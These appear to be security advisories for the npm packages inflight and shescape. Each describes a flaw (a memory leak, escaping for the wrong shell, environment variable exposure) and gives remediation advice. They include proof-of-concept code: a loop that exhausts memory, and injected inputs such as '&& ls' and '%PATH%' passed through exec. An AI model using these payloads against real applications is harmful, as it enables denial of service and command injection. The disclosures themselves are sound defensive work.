Find, fix and prevent vulnerabilities in your code.

Overview

Affected versions of this package are vulnerable to Missing Release of Resource after Effective Lifetime via the makeres function due to improperly deleting keys from the reqs object after execution of callbacks. This behavior causes the keys to remain in the reqs object, which leads to resource exhaustion.

Exploiting this vulnerability results in crashing the node process or in the application crash.

Note: This library is not maintained, and currently, there is no fix for this issue. To overcome this vulnerability, several dependent packages have eliminated the use of this library.

To trigger the memory leak, an attacker would need to have the ability to execute or influence the asynchronous operations that use the inflight module within the application. This typically requires access to the internal workings of the server or application, which is not commonly exposed to remote users. Therefore, “Attack vector” is marked as “Local”.

PoC

const inflight = require('inflight');

function testInflight() {
  let i = 0;
  function scheduleNext() {
    let key = `key-${i++}`;
    const callback = () => {
    };
    for (let j = 0; j < 1000000; j++) {
      inflight(key, callback);
    }

    setImmediate(scheduleNext);
  }


  if (i % 100 === 0) {
    console.log(process.memoryUsage());
  }

  scheduleNext();
}

testInflight();

Remediation

There is no fixed version for inflight.

References

• GitHub Issue
• GitHub PR

Overview

shescape is a simple shell escape library

Affected versions of this package are vulnerable to Improper Neutralization due to possible escaping the wrong shell, thus allowing attackers to bypass protections. Note: you are only vulnerable if you are using this package on Windows in a threaded context.

PoC

// vulnerable.js

import { exec } from "node:child_process";
import { Worker, isMainThread } from 'node:worker_threads';

import * as shescape from "shescape";

if (isMainThread) {
  // 1. Something like a worker thread must be used. The reason being that they
  // unexpectedly change environment variable names on Windows.
  new Worker("./vulnerable.js");
} else {
  // 2. Example configuration that's problematic. In this setup example the
  // expected default system shell is CMD. We configure the use of PowerShell.
  // Shescape will fail to look up PowerShell and default to escaping for CMD
  // instead, resulting in the vulnerability.
  const options = {
    shell: "powershell",
    interpolation: true,
  };

  // 3. Using shescape to protect against attacks, this is correct.
  const escaped = shescape.escape("&& ls", options);

  // 4. Invoking a command with the escaped user input, this is vulnerable in
  // this case.
  exec(`echo Hello ${escaped}`, options, (error, stdout) => {
    if (error) {
      console.error(`An error occurred: ${error}`);
    } else {
      console.log(stdout);
    }
  });
}

Remediation

Upgrade shescape to version 1.7.4 or higher.

References

• GitHub Commit
• GitHub PR
• GitHub Release

Overview

shescape is a simple shell escape library

Affected versions of this package are vulnerable to Information Exposure such that an attacker may be able to get read-only access to environment variables.

Note:

This impact users of Shescape:

1. On Windows using the Windows Command Prompt (i.e. cmd.exe), and
2. Using quote/quoteAll or escape/escapeAll with the interpolation option set to true.

Workaround

Users who are unable to upgrade to the fixed version can remove all instances of % from user input, either before or after using Shescape.

PoC

import * as cp from "node:child_process";
import * as shescape from "shescape";

// 1. Prerequisites
const options = {
    shell: "cmd.exe",
    // Or
    shell: undefined, // Only if the default shell is CMD

    // And
    interpolation: true, // Only applies to `escape` and `escapeAll` usage
}

// 2. Attack (one of many)
const payload = "%PATH%";

// 3. Usage
let escapedPayload;

escapedPayload = shescape.quote(payload, options);
// Or
escapedPayload = shescape.quoteAll([payload], options);
// Or
escapedPayload = shescape.escape(payload, options);
// Or
escapedPayload = shescape.escapeAll([payload], options);

// And (example)
const result = cp.execSync(`echo Hello ${escapedPayload}`, options);

// 4. Impact
console.log(result.toString());
// Outputs "Hello" followed by the contents of the PATH environment variable

Remediation

Upgrade shescape to version 1.7.1 or higher.

References

• GitHub Commit
• GitHub PR
• GitHub Release